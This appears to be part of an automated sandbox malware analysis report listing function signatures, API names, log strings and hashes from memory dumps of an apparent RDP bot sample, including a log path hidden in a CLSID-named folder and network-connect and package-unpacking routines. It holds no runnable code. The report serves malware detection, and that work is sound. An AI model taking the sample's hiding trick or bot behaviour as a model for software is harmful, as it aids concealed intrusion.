                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpin_mbscatfopen
                                                                    • String ID: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$main.log$service
                                                                    • API String ID: 3216678114-1460613360
                                                                    • Opcode ID: 6f494a988963525dfc8c9e6694f7ed676b47cce2b4ff5cefa6908507d4734c9b
                                                                    • Instruction ID: d57b32e82fb8dca6c47ca3ddaf074084dd8de27df0e18e8ca890d19e5b1960a8
                                                                    • Opcode Fuzzy Hash: 6f494a988963525dfc8c9e6694f7ed676b47cce2b4ff5cefa6908507d4734c9b
                                                                    • Instruction Fuzzy Hash: 01510B50E0C603A1FA2197DDE9813B83391AF15754F554332EB0DCB2B6EE6DA95AC3C2
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$_errno_mbscpy$_mbscatfopenfseek
                                                                    • String ID: %TEMP%$(package != NULL)$(target != NULL)$H:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x)$[E] (%s) -> Failed(package=%s,target=%s,err=%08x)$[I] (%s) -> Done(package=%s,target=%s)$[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u)$package_unpack
                                                                    • API String ID: 3066828623-625159688
                                                                    • Opcode ID: 105523515e84c8d438c400628abfd7f6ba265d1413e23efcc273f54c6047ae63
                                                                    • Instruction ID: 7a1e07686a3af298e1c7839be3bc74e5f2c292201f8115106352a8d4782161bf
                                                                    • Opcode Fuzzy Hash: 105523515e84c8d438c400628abfd7f6ba265d1413e23efcc273f54c6047ae63
                                                                    • Instruction Fuzzy Hash: 6B813161B08647A5EB109B9DE8403A97761FB44788F844236FB4DCB6A9EE7CE509C780
                                                                    APIs
                                                                    • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000013B444313D0,?,00007FF6BFD784F0,00007FF6BFD684E9), ref: 00007FF6BFD63DD9
                                                                    • LockFileEx.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000013B444313D0,?,00007FF6BFD784F0,00007FF6BFD684E9), ref: 00007FF6BFD63E12
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000013B444313D0,?,00007FF6BFD784F0,00007FF6BFD684E9), ref: 00007FF6BFD63EE7
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000013B444313D0,?,00007FF6BFD784F0,00007FF6BFD684E9), ref: 00007FF6BFD63FCC
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000013B444313D0,?,00007FF6BFD784F0,00007FF6BFD684E9), ref: 00007FF6BFD64140
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLast$CloseCreateHandleLock
                                                                    • String ID: (lock != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$service
                                                                    • API String ID: 2747014929-3958755462
                                                                    • Opcode ID: 54ee31f5105c176933aa956faabb0ff0d66d276a4c84ab9d9d605d99f51c3a37
                                                                    • Instruction ID: 4e41f37da46a08cd82b98af45d558b09965602a9300557c38a44163a53d9f3ab
                                                                    • Opcode Fuzzy Hash: 54ee31f5105c176933aa956faabb0ff0d66d276a4c84ab9d9d605d99f51c3a37
                                                                    • Instruction Fuzzy Hash: 44813120A0C74BA1F730AB9CA54437873505F11758F141332FB6E8A7F6EE2EA995D392
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                    • API String ID: 3154682637-708158336
                                                                    • Opcode ID: b1219be86de29e58c55c1eaa20dbaf743f60072c4e4c0546304cb5b3e9e60796
                                                                    • Instruction ID: 67a8faef22bbe426dc50163e0a0a4d727c890a300125e2eb43c5deb6c1c4be09
                                                                    • Opcode Fuzzy Hash: b1219be86de29e58c55c1eaa20dbaf743f60072c4e4c0546304cb5b3e9e60796
                                                                    • Instruction Fuzzy Hash: 9451F361A0CE4282E7205BA7E4802BD379ABF85774F5013B9E86E47AF5DF7CE5058702
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                    • API String ID: 3154682637-708158336
                                                                    • Opcode ID: b1d6f88f48f977056472bc5e2fc88cb5e718e3b35a49b9fbb396dfdf92b66e85
                                                                    • Instruction ID: 343caa97ffda4bfe0f4221d2e56de9c1578514f95bf3b53fc5566dca7af5dcf2
                                                                    • Opcode Fuzzy Hash: b1d6f88f48f977056472bc5e2fc88cb5e718e3b35a49b9fbb396dfdf92b66e85
                                                                    • Instruction Fuzzy Hash: 2E51C2A2A0DB4642EA349F59E8003B97761EF84764F041336E8EE466F5DE7CE5458F00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                    • API String ID: 3154682637-708158336
                                                                    • Opcode ID: ae9739fa974ddfb92da4c03f28b81f0a1c66518a12a67d205bf7b9f66d2fe415
                                                                    • Instruction ID: f8cc9acb3577812eeb872c70c26716e181077633560a2ac78452bc2b3382658b
                                                                    • Opcode Fuzzy Hash: ae9739fa974ddfb92da4c03f28b81f0a1c66518a12a67d205bf7b9f66d2fe415
                                                                    • Instruction Fuzzy Hash: CD51B121B0C68282E6309F29E8006F976A1AF85764F141335E9EE877F9FE7DE5458F00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                    • API String ID: 3154682637-708158336
                                                                    • Opcode ID: 94de46d72c65ae857ef5def21900205f0e79c633917917b5e84958e88d4ca194
                                                                    • Instruction ID: b9f556874499c8c9719a35dcf5a02849681203973357871b0034e7828cca4008
                                                                    • Opcode Fuzzy Hash: 94de46d72c65ae857ef5def21900205f0e79c633917917b5e84958e88d4ca194
                                                                    • Instruction Fuzzy Hash: 2451F625A0C7C2A1FA289B98E8842BA6651EF86770F140335DCED476F6DF7EE5058702
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                    • API String ID: 3154682637-708158336
                                                                    • Opcode ID: 38dbff91742fcd545e8c6506307d99f0f3ef583879267fb3d588f94e721ee5a1
                                                                    • Instruction ID: 1aa727a16737b71545cb7ab8ea98d08a4113c5f9cb354e424e22e7b6f591b79d
                                                                    • Opcode Fuzzy Hash: 38dbff91742fcd545e8c6506307d99f0f3ef583879267fb3d588f94e721ee5a1
                                                                    • Instruction Fuzzy Hash: B251C271A0C65742F6605B25E8002B97761AF85B64F14033BE9FE46AF6EE7CE545C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                    • API String ID: 1412730629-3633878399
                                                                    • Opcode ID: bfa06299d377331daaefa4f7970977a13a5e79947c507c36398a4aca178b456a
                                                                    • Instruction ID: 7c2b2521d932f71d76610fb3a4bff88c25c0af3ada0aea55529cedf79b3ee8f7
                                                                    • Opcode Fuzzy Hash: bfa06299d377331daaefa4f7970977a13a5e79947c507c36398a4aca178b456a
                                                                    • Instruction Fuzzy Hash: 26511F20A0CF47C2FB71979AA8D437D225A9F05374F5403BAC53E462F2EF6EA8858301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                    • API String ID: 1412730629-3633878399
                                                                    • Opcode ID: 3d1ab3aa8f4161a05aa8dfdd1c0cce3f996ef00871ce4195b1a1b84c650aac4e
                                                                    • Instruction ID: b13b76025f1c92d6c42aac831637d9bcd072b238c26446a8178e8eeab5ea1d2a
                                                                    • Opcode Fuzzy Hash: 3d1ab3aa8f4161a05aa8dfdd1c0cce3f996ef00871ce4195b1a1b84c650aac4e
                                                                    • Instruction Fuzzy Hash: 5B5124A1B0C70782FB309F54A8843792290EF14375F242336CAEE472F5DE6DA8859E52
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                    • API String ID: 1412730629-3633878399
                                                                    • Opcode ID: 49160c02cce2c89ffc56554c0373e9f5e5be1747f4788ff1eb59c31af80c948e
                                                                    • Instruction ID: 2665dd818eee34b28fbf7a27c11049ea72c0e34533a30b0e8de22bd7fce702ee
                                                                    • Opcode Fuzzy Hash: 49160c02cce2c89ffc56554c0373e9f5e5be1747f4788ff1eb59c31af80c948e
                                                                    • Instruction Fuzzy Hash: A651E760A0E74382FB305F1CA4843F82696AF05365F640736C5EE463F5EF6DA9859F41
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                    • API String ID: 1412730629-3633878399
                                                                    • Opcode ID: 9f20d362d937536f0ee4103508d9b1139d0d6585478f89b21611969e913930d6
                                                                    • Instruction ID: 6db533256c650b6ff275134fcbbea626e4eb6488a5014beca231945cc607e344
                                                                    • Opcode Fuzzy Hash: 9f20d362d937536f0ee4103508d9b1139d0d6585478f89b21611969e913930d6
                                                                    • Instruction Fuzzy Hash: 9651E860A1C7C3A2FB60579CA8C83B823519F06379F640736C5EE462F1DE6FA9859243
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                    • API String ID: 1412730629-3633878399
                                                                    • Opcode ID: 281e6b280061e0635a5243834af1028dd6d232271e6f00ea43ae733916f1591a
                                                                    • Instruction ID: a6be6d44f69f868ddb7340421f4c4fd992c299d07847dbc7cb40b45825094bf5
                                                                    • Opcode Fuzzy Hash: 281e6b280061e0635a5243834af1028dd6d232271e6f00ea43ae733916f1591a
                                                                    • Instruction Fuzzy Hash: 49512860F0E743A2FB305B14A4843B82663AF05765F240B37D5FE462F2DF6DA9899342
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                                                                    • String ID: (path != NULL)$5$H:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc$service
                                                                    • API String ID: 1423203057-595982613
                                                                    • Opcode ID: 80942592db8f3c253b1855c65e91fcdc3096fbaa6f48945d97735cc1c0d4eca0
                                                                    • Instruction ID: f5a4930906b0e6814fca34a61631c6eeca7ee3ec49effd166276a48dfc1ef1d9
                                                                    • Opcode Fuzzy Hash: 80942592db8f3c253b1855c65e91fcdc3096fbaa6f48945d97735cc1c0d4eca0
                                                                    • Instruction Fuzzy Hash: CFA1C262A0D682A1EB119B99E8003B97B61BF42784F484236FF4DCF7A5DE3DE545C380
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: OpenQueryValuefflushfwrite
